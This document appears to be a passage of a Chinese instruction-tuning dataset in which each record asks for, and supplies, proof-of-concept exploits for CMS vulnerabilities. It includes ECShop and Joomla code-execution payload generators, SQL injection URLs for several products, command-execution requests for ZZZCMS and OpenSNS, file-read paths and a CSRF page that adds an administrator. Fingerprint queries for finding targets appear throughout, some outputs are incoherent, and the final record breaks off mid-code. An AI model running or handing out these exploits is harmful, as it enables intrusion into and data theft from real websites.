  59. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ECShop 2.x/3.x SQL注入/任意代码执行漏洞\n漏洞描述:ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。 参考链接: - https://paper.seebug.org/691/\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. <?php\n$shell = bin2hex(\"{\\$asd'];phpinfo\\t();//}xxx\");\n$id = \"-1' UNION/*\";\n$arr = [\n    \"num\" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),\n    \"id\" => $id\n];\n\n$s = serialize($arr);\n\n$hash3 = '45ea207d7a2b68c49582d2d22adf953a';\n$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';\n\necho \"POC for ECShop 2.x: \\n\";\necho \"{$hash2}ads|{$s}{$hash2}\";\necho \"\\n\\nPOC for ECShop 3.x: \\n\";\necho \"{$hash3}ads|{$s}{$hash3}\";\n3. POC for ECShop 2.x: \n554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:107:\"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/*\";}554fcae493e564ee0dc75bdf2ebf94ca\n\nPOC for ECShop 3.x: \n45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:107:\"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/*\";}45ea207d7a2b68c49582d2d22adf953a\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/ECShop 2.x3.x SQL注入任意代码执行漏洞.md"}
    60. 

  60. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:极致CMS alipay_return_pay SQL注入漏洞\n漏洞描述:极致CMS支付插件中存在SQL注入漏洞,通过漏洞可以获取数据库信息\n影响版本:``` 极致CMS ```\n网络测绘:``` icon_hash=\"1657387632\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. icon_hash=\"1657387632\"\n2. /**\n\t参数过滤,格式化\n**/\nfunction format_param($value=null,$int=0){\n\tif($value==null){ return '';}\n\tswitch ($int){\n\t\tcase 0://整数\n\t\t\treturn (int)$value;\n\t\tcase 1://字符串\n\t\t\t$value=htmlspecialchars(trim($value), ENT_QUOTES);\n\t\t\tif(version_compare(PHP_VERSION,'7.4','>=')){\n\t\t\t\t$value = addslashes($value);\n\t\t\t}else{\n\t\t\t\tif(!get_magic_quotes_gpc())$value = addslashes($value);\n\t\t\t}\n\t\t\t\n\t\t\treturn $value;\n\t\tcase 2://数组\n\t\t\tif($value=='')return '';\n\t\t\tarray_walk_recursive($value, \"array_format\");\n\t\t\treturn $value;\n\t\tcase 3://浮点\n\t\t\treturn (float)$value;\n\t\tcase 4:\n\t\t\tif(version_compare(PHP_VERSION,'7.4','>=')){\n\t\t\t\t$value = addslashes($value);\n\t\t\t}else{\n\t\t\t\tif(!get_magic_quotes_gpc())$value = addslashes($value);\n\t\t\t}\n\t\t\treturn trim($value);\n\t}\n}\n\n//过滤XSS攻击\nfunction SafeFilter(&$arr) \n{\n   $ra=Array('/([\\x00-\\x08,\\x0b-\\x0c,\\x0e-\\x19])/','/script/','/javascript/','/vbscript/','/expression/','/applet/'\n   ,'/meta/','/xml/','/blink/','/link/','/style/','/embed/','/object/','/frame/','/layer/','/title/','/bgsound/'\n   ,'/base/','/onload/','/onunload/','/onchange/','/onsubmit/','/onreset/','/onselect/','/onblur/','/onfocus/',\n   '/onabort/','/onkeydown/','/onkeypress/','/onkeyup/','/onclick/','/ondblclick/','/onmousedown/','/onmousemove/'\n   ,'/onmouseout/','/onmouseover/','/onmouseup/','/onunload/');\n     \n   if (is_array($arr))\n   {\n     foreach ($arr as $key => $value) \n     {\n        if (!is_array($value))\n        {\n            if(version_compare(PHP_VERSION,'7.4','>=')){\n\t\t\t\t$value  = addslashes($value); \n\t\t\t}else{\n\t\t\t\tif (!get_magic_quotes_gpc()){\n\t\t\t\t\t$value  = addslashes($value); \n\t\t\t\t}\n\t\t\t}\n          $value = preg_replace($ra,'',$value);     //删除非打印字符,粗暴式过滤xss可疑字符串\n          $arr[$key]     = htmlentities(strip_tags($value)); //去除 HTML 和 PHP 标记并转换为 HTML 实体\n        }\n        else\n        {\n          SafeFilter($arr[$key]);\n        }\n     }\n   }\n}\n3. // 查询一条\n    public function find($where=null,$order=null,$fields=null,$limit=1)\n    {\n\t   if( $record = $this->findAll($where, $order, $fields, 1) ){\n\t\t\treturn array_pop($record);\n\t\t}else{\n\t\t\treturn FALSE;\n\t\t}\n    }\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/极致CMS alipay_return_pay SQL注入漏洞.md"}
    61. 

  61. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Ke361 TopicController.class.php SQL注入漏洞 CNVD-2017-04380\n漏洞描述:Ke361 TopicController.class.php 文件中 detai() 函数中存在 SQL注入漏洞\n影响版本:``` Ke361 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. public function detail(){\n         $id = I('id');\n         $where['tid'] = $id;\n         $TopicModel = new TopicModel();\n         $topicInfo = $TopicModel->info($id);\n        //  if(empty($topicInfo)){\n        //      $this->error('您查看的专题不存在哦!');\n        //  }\n  \t\t\t//  这里注释掉,默认不存在专题\n         M('Topic')->where('id='.$id)->setInc('hits');\n         $this->setSiteTitle($topicInfo['title']);\n         $goods = $this->lists(D('Goods'),$where);\n         foreach ($goods as $k=>$v){\n             $goods[$k]['url'] = U('/goods/'.$v['id']);\n         }\n         $this->assign('goods',$goods);\n         $this->assign('topic',$topicInfo);\n         $this->display();\n     }\n2. /index.php?s=/Topic/detail/id/1)%20%20AND%20updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--+\n3. https://gitee.com/jcove/ke361\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Ke361 TopicController.class.php SQL注入漏洞 CNVD-2017-04380.md"}
    62. 

  62. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ZZZCMS parserSearch 远程命令执行漏洞\n漏洞描述:ZZZCMS parserSearch 存在模板注入导致远程命令执行漏洞 参考链接: - https://srcincite.io/advisories/src-2021-0015/ - https://nvd.nist.gov/vuln/detail/CVE-2021-32605\n影响版本:``` ZZZCMS ```\n网络测绘:``` app=\"zzzcms\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. app=\"zzzcms\"\n2. POST /?location=search HTTP/1.1\nHost: \nContent-Length: 30\nPragma: no-cache\nCache-Control: no-cache\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nContent-Type: text/plain\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: PHPSESSID=rbuhrqqhoctntnak8slkascqp1; keys=%7Bif%3A%3DPHPINFO%28%29%7D%7Bend+if%7D%0D%0A\n\n\nkeys={if:=PHPINFO()}{end if}\n3. POST /?location=search HTTP/1.1\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/ZZZCMS parserSearch 远程命令执行漏洞.md"}
    63. 

  63. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OpenSNS AuthorizeController.class.php 后台远程命令执行漏洞\n漏洞描述:OpenSNS AuthorizeController.class.php文件 ssoCallback() 函数存在命令执行漏洞,在登录的情况下可以获取服务器权限\n影响版本:``` OpenSNS ```\n网络测绘:``` icon_hash=\"1167011145\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. icon_hash=\"1167011145\"\n2. POST /admin.php?s=/Authorize/ssoCallback\\\n\nconfig[SSO_CONFIG]=phpinfo();\n3. POST /admin.php?s=/Authorize/ssoCallback\\\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/OpenSNS AuthorizeController.class.php 后台远程命令执行漏洞.md"}
    64. 

  64. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:DocCMS keyword SQL注入漏洞\n漏洞描述:DocCMS keyword参数存在 SQL注入漏洞,攻击者通过漏洞可以获取数据库信息\n影响版本:``` DocCMS ```\n网络测绘:``` app=\"Doccms\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. app=\"Doccms\"\n2. /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33\n3. ' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/DocCMS keyword SQL注入漏洞.md"}
    65. 

  65. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Joomla 3.4.5 反序列化漏洞 CVE-2015-8562\n漏洞描述:本漏洞根源是PHP5.6.13前的版本在读取存储好的session时,如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中,编码是utf8,当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败,最后触发反序列化漏洞。 通过Joomla中的Gadget,可造成任意代码执行的结果。 详情可参考: - https://www.leavesongs.com/PENETRATION/joomla-unserialize-code-execute-vulnerability.html\n影响版本:``` Joomla 1.5.x, 2.x, and 3.x before 3.4.6 PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2015-8562\n【POC利用方法】\n1. Joomla 1.5.x, 2.x, and 3.x before 3.4.6\nPHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45\n2. docker-compose up -d\n3. <?php\nclass JSimplepieFactory {\n}\nclass JDatabaseDriverMysql {\n\n}\nclass SimplePie {\n    var $sanitize;\n    var $cache;\n    var $cache_name_function;\n    var $javascript;\n    var $feed_url;\n    function __construct()\n    {\n        $this->feed_url = \"phpinfo();JFactory::getConfig();exit;\";\n        $this->javascript = 9999;\n        $this->cache_name_function = \"assert\";\n        $this->sanitize = new JDatabaseDriverMysql();\n        $this->cache = true;\n    }\n}\n\nclass JDatabaseDriverMysqli {\n    protected $a;\n    protected $disconnectHandlers;\n    protected $connection;\n    function __construct()\n    {\n        $this->a = new JSimplepieFactory();\n        $x = new SimplePie();\n        $this->connection = 1;\n        $this->disconnectHandlers = [\n            [$x, \"init\"],\n        ];\n    }\n}\n\n$a = new JDatabaseDriverMysqli();\n$poc = serialize($a); \n\n$poc = str_replace(\"\\x00*\\x00\", '\\\\0\\\\0\\\\0', $poc);\n\necho \"123}__test|{$poc}\\xF0\\x9D\\x8C\\x86\";\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Joomla 3.4.5 反序列化漏洞 CVE-2015-8562.md"}
    66. 

  66. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:禅道 V16.5 SQL 注入 CNVD-2022-42853\n漏洞描述:禅道是一款专业的国产开源研发项目管理软件,集产品管理,项目管理, 质量管理,文档管理,组织管理和事务管理于一体,完整覆盖了研发项目管理的核心流程,管理思想基于国际流行的敏捷项目管理方法-Scrum,在遵循其价值观的基础上,结合国内项目研发的现状,整合了任务管理,需要管理,Bug 管理,用例管理等多种功能,覆盖软件从计划到发布的整个生命周期。 禅道 V16.5 未对输入的 account 参数内容作过滤校验,导致攻击者拼接恶意 SQL 语句执行。\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. https://www.zentao.net/dl/zentao/16.5/ZenTaoPMS.16.5.win64.exe\n2. admin' and updatexml(1,concat(0x7e,(user),0x7e),1) and '1'='1\n3. POST /zentao/user-login.html HTTP/1.1\nHost: 127.0.0.1\nContent-Type: application/x-www-form-urlencoded\n\naccount=admin%27+and++updatexml%281%2Cconcat%280x1%2Cuser%28%29%29%2C1%29+and+%271%27%3D%271\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/禅道 V16.5 SQL 注入 CNVD-2022-42853.md"}
    67. 

  67. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:禅道 11.6 api-getModel-api-sql-sql 后台SQL注入漏洞\n漏洞描述:禅道 11.6 版本中对用户接口调用权限过滤不完善,导致调用接口执行SQL语句导致SQL注入\n影响版本:``` 禅道 11.6 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. docker run --name zentao_v11.6 -p 8084:80 -v /u01/zentao/www:/app/zentaopms -v /u01/zentao/data:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=123456 -d docker.io/yunwisdom/zentao:v11.6\n2. $app = router::createApp('pms', dirname(dirname(__FILE__)), 'router');\n3. public static function createApp($appName = 'demo', $appRoot = '', $className = '')\n    {\n        if(empty($className)) $className = __CLASS__;\n        return new $className($appName, $appRoot);\n    }\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/禅道 11.6 api-getModel-api-sql-sql 后台SQL注入漏洞.md"}
    68. 

  68. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ShopXO download 任意文件读取漏洞 CNVD-2021-15822\n漏洞描述:ShopXO是一套开源的企业级开源电子商务系统。ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息\n影响版本:``` ShopXO ```\n网络测绘:``` app=\"ShopXO企业级B2C电商系统提供商\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. app=\"ShopXO企业级B2C电商系统提供商\"\n2. GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/ShopXO download 任意文件读取漏洞 CNVD-2021-15822.md"}
    69. 

  69. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:CmsEasy update_admin.php 后台任意文件上传漏洞\n漏洞描述:CmsEasy 后台存在任意文件上传漏洞,通过文件 service.php 加密Url参数执行即可上传任意文件\n影响版本:``` CmsEasy V7.7.5_20210919 ```\n网络测绘:``` body=\"cmseasyedit\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. CmsEasy V7.7.5_20210919\n2. body=\"cmseasyedit\"\n3. function downfile_action()\n    {\n        $url = front::get('url');\n        $url=service::getInstance()->unlockString($url,\"cmseasy_url\");\n        $res = $this->get_file($url, 'cache');\n        if (!$res) {\n            $res = array(\n                'err' => 1,\n                'data' => lang_admin('update_package_download_failed'),\n            );\n        } else {\n            @unlink('upgrade/config_cn.php');\n            @unlink('upgrade/config_cn.tmp.php');\n            @unlink('upgrade/upgrade.sql');\n            @unlink('upgrade/command.php');\n            front::remove(ROOT.'/cache/data');\n            front::remove(ROOT.'/cache/template');//清空全部语言\n            $langdata=getlang();\n            if($langdata != \"\"){\n                foreach ($langdata as $key=>$val){\n                    front::remove(ROOT.'/cache/'.$val['langurlname']);\n                    front::remove(ROOT.'/'.$val['langurlname'].'/template');\n                }\n            }\n            //先清空缓存\n            user::deletesession();\n            category::deletesession();\n            //提取分类\n            if(file_exists(ROOT.\"/lib/table/type.php\")) {\n                type::deletesession();\n            }\n            //提取专题\n            if(file_exists(ROOT.\"/lib/table/special.php\")) {\n                special::deletesession();\n            }\n            $archive = new PclZip('cache/patch.zip');\n            $archive->extract(PCLZIP_OPT_PATH, ROOT, PCLZIP_OPT_REPLACE_NEWER);\n\n            if(file_exists('upgrade/upgrade.sql')) {\n                $sqlquery = file_get_contents('upgrade/upgrade.sql');\n                $sqlquery = str_replace('`cmseasy_', '`' . config::getdatabase('database', 'prefix'), $sqlquery);\n\n                $sqlquery = str_replace(\"\\r\", \"\", $sqlquery);\n                $sqls = preg_split(\"/;(--)*[ \\t]{0,}\\n/\", $sqlquery);\n                $this->exec_cms_sql($sqls);\n            }\n\n            if(file_exists('upgrade/command.php')){\n                include ROOT . '/upgrade/command.php';\n            }\n            $res = array(\n                'err' => 0,\n                'message' => $this->message,\n                'data' => lang_admin('upgrade_successful'),\n            );\n        }\n\n        echo json_encode($res);\n        exit;\n    }\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/CmsEasy update_admin.php 后台任意文件上传漏洞.md"}
    70. 

  70. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OpenSNS Application ShareController.class.php 远程命令执行漏洞\n漏洞描述:OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令\n影响版本:``` OpenSNS ```\n网络测绘:``` icon_hash=\"1167011145\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. icon_hash=\"1167011145\"\n2. /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/OpenSNS Application ShareController.class.php 远程命令执行漏洞.md"}
    71. 

  71. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:CxCMS Resource.ashx 任意文件读取漏洞\n漏洞描述:CxCMS 存在任意文件读取,由于 /Sys/Handler/Resource.ashx 页面 _FilePath 参数过滤不严,导致可以读取系统敏感文件。\n影响版本:``` CxCMS ```\n网络测绘:``` \"Powered by CxCms\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. \"Powered by CxCms\"\n2. /Sys/Handler/Resource.ashx?_FilePath=../../web.config\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/CxCMS Resource.ashx 任意文件读取漏洞.md"}
    72. 

  72. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PbootCMS search SQL注入漏洞\n漏洞描述:PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息\n影响版本:``` PbootCMS < 1.2.1 ```\n网络测绘:``` app=\"PBOOTCMS\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. PbootCMS < 1.2.1\n2. app=\"PBOOTCMS\"\n3. /index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/PbootCMS search SQL注入漏洞.md"}
    73. 

  73. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PbootCMS ext_price SQL注入漏洞\n漏洞描述:PbootCMS 存在SQL注入漏洞。通过漏洞可获取数据库敏感信息\n影响版本:``` PbootCMS < 1.2.1 ```\n网络测绘:``` app=\"PBOOTCMS\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. PbootCMS < 1.2.1\n2. app=\"PBOOTCMS\"\n3. /index.php/Index?ext_price%3D1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,user(),0x23)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Index?ext_price%3D1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,user(),0x23)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1));%23=123)\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/PbootCMS ext_price SQL注入漏洞.md"}
    74. 

  74. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WeiPHP5.0 download_imgage 前台文件任意读取 CNVD-2020-68596\n漏洞描述:Weiphp5.0 存在前台文件任意读取漏洞,可以读取数据库配置等敏感文件\n影响版本:``` Weiphp <= 5.0 ```\n网络测绘:``` app=\"WeiPHP\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. Weiphp <= 5.0\n2. app=\"WeiPHP\"\n3. public function _download_imgage($media_id, $picUrl = '', $dd = null)\n    {\n        $savePath = SITE_PATH . '/public/uploads/picture/' . time_format(NOW_TIME, 'Y-m-d');\n        mkdirs($savePath);\n        $cover_id = 0;\n        if (empty($picUrl)) {\n            // 获取图片URL\n            $url = 'https://api.weixin.qq.com/cgi-bin/material/get_material?access_token=' . get_access_token();\n            $param['media_id'] = $media_id;\n            // dump($url);\n            $picContent = post_data($url, $param, 'json', false);\n            $picjson = json_decode($picContent, true);\n            // dump($picjson);die;\n            if (isset($picjson['errcode']) && $picjson['errcode'] != 0) {\n                $cover_id = do_down_image($media_id, $dd['thumb_url']);\n                if (!$cover_id) {\n                    return 0;\n                    exit();\n                }\n            }\n            $picName = NOW_TIME . uniqid() . '.jpg';\n            $picPath = $savePath . '/' . $picName;\n            $res = file_put_contents($picPath, $picContent);\n        } else {\n            $content = wp_file_get_contents($picUrl);\n            // 获取图片扩展名\n            $picExt = substr($picUrl, strrpos($picUrl, '=') + 1);\n            if (empty($picExt) || $picExt == 'jpeg' || strpos('jpg,gif,png,jpeg,bmp', $picExt) === false) {\n                $picExt = 'jpg';\n            }\n            $picName = NOW_TIME . uniqid() . '.' . $picExt;\n            $picPath = $savePath . '/' . $picName;\n            $res = file_put_contents($picPath, $content);\n            if (!$res) {\n                $cover_id = do_down_image($media_id);\n                if (!$cover_id) {\n                    return 0;\n                    exit();\n                }\n            }\n        }\n\n        if ($res) {\n            $file = array(\n                'name' => $picName,\n                'type' => 'application/octet-stream',\n                'tmp_name' => $picPath,\n                'size' => $res,\n                'error' => 0\n            );\n\n            $File = D('home/Picture');\n            $cover_id = $File->addFile($file);\n        }\n        return $cover_id;\n}\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/WeiPHP5.0 download_imgage 前台文件任意读取 CNVD-2020-68596.md"}
    75. 

  75. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:74cms v5.0.1 后台跨站请求伪造漏洞 CVE-2019-11374\n漏洞描述:在74CMS v5.0.1后台存在一个跨站请求伪造(CSRF)漏洞,该漏洞url:/index.php?m=admin&c=admin&a=add 攻击者可以利用该漏洞诱骗管理员点击恶意页面,从而任意添加一个后台管理员账户,达到进入后台,获得一个后台管理员角色的控制权。\n影响版本:``` 74CMS v5.0.1 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2019-11374\n【POC利用方法】\n1. 74CMS v5.0.1\n2. <!DOCTYPE html>\n<html>\n  <head>\n  <title> CSRF </title>\n  <script type=\"text/javascript\">\n    function exec1(){\n      document.getElementById('form1').submit();\n    }\n  </script>\n  </head>\n  <body onload=\"exec1();\">\n    <form id=\"form1\" action=\"https://www.0dayhack.com/index.php?m=Admin&c=admin&a=add\" method=\"POST\">\n      <input type=\"hidden\" name=\"username\" value=\"admin688\" />\n  <input type=\"hidden\" name=\"email\" value=\"111111111@qq.com\" />\n      <input type=\"hidden\" name=\"password\" value=\"admin688\" />\n      <input type=\"hidden\" name=\"repassword\" value=\"admin688\" />  \n  <input type=\"hidden\" name=\"role_id\" value=\"1\" />\n    </form>\n  </body>\n</html>\n3. <body onload=\"exec1();\">\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/74cms v5.0.1 后台跨站请求伪造漏洞 CVE-2019-11374.md"}
    76. 

  76. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress Redux Framework class-redux-helpers.php 敏感信息泄漏漏洞 CVE-2021-38314\n漏洞描述:2021年8月爆出Redux Framework存在未授权的敏感信息泄露漏洞,CVE编号为CVE-2021-38314,影响v4.2.11及以下版本,发送特定的请求包可以在未授权的情况下获取服务器敏感信息\n影响版本:``` Redux Framework <= v4.2.11 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2021-38314\n【POC利用方法】\n1. Redux Framework <= v4.2.11\n2. $support_hash = md5( md5( Redux_Functions_Ex::hash_key() . '-redux' ) . '-support' );\nadd_action( 'wp_ajax_nopriv_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) );\nadd_action( 'wp_ajax_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) );\n$hash_arg = md5( trailingslashit( network_site_url() ) . '-redux' );\nadd_action( 'wp_ajax_nopriv_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) );\nadd_action( 'wp_ajax_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) );\nadd_action( 'wp_ajax_redux_support_hash', array( 'Redux_Functions', 'support_hash' ) );\n\nadd_filter( 'redux/tracking/options', array( 'Redux_Helpers', 'redux_stats_additions' ) );\n3. public static function hash_arg() {\n\t\t\techo esc_html( md5( Redux_Functions_Ex::hash_key() . '-redux' ) );\n\t\t\tdie();\n\t\t}\npublic static function support_args() {\n\t\t\theader( 'Expires: Mon, 26 Jul 1997 05:00:00 GMT' );\n\t\t\theader( 'Last-Modified: ' . gmdate( 'D, d M Y H:i:s' ) . 'GMT' );\n\t\t\theader( 'Expires: Sat, 26 Jul 1997 05:00:00 GMT' );\n\t\t\theader( 'Cache-Control: no-store, no-cache, must-revalidate' );\n\t\t\theader( 'Cache-Control: post-check=0, pre-check=0', false );\n\t\t\theader( 'Pragma: no-cache' );\n\n\t\t\t$instances = Redux::all_instances();\n\n\t\t\tif ( isset( $_REQUEST['i'] ) && ! empty( $_REQUEST['i'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification\n\t\t\t\tif ( is_array( $instances ) && ! empty( $instances ) ) {\n\t\t\t\t\tforeach ( $instances as $opt_name => $data ) {\n\t\t\t\t\t\tif ( md5( $opt_name . '-debug' ) === $_REQUEST['i'] ) { // phpcs:ignore WordPress.Security.NonceVerification\n\t\t\t\t\t\t\t$array = $data;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tif ( isset( $array ) ) {\n\n\t\t\t\t\t// We only want the extension names and versions.\n\t\t\t\t\t$array->extensions = self::get_extensions( $opt_name );\n\t\t\t\t\t$to_return         = array();\n\n\t\t\t\t\t// Filter out all the unwanted data.\n\t\t\t\t\tforeach ( $array as $key => $value ) {\n\t\t\t\t\t\tif ( in_array(\n\t\t\t\t\t\t\t$key,\n\t\t\t\t\t\t\tarray(\n\t\t\t\t\t\t\t\t// 'fields',\n\t\t\t\t\t\t\t\t'extensions',\n\t\t\t\t\t\t\t\t'sections',\n\t\t\t\t\t\t\t\t'args',\n\t\t\t\t\t\t\t\t// 'field_types'\n\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\ttrue\n\t\t\t\t\t\t) ) {\n\t\t\t\t\t\t\t$to_return[ $key ] = $value;\n\t\t\t\t\t\t} else { // phpcs:ignore Generic.CodeAnalysis.EmptyStatement\n\t\t\t\t\t\t\t// phpcs:ignore 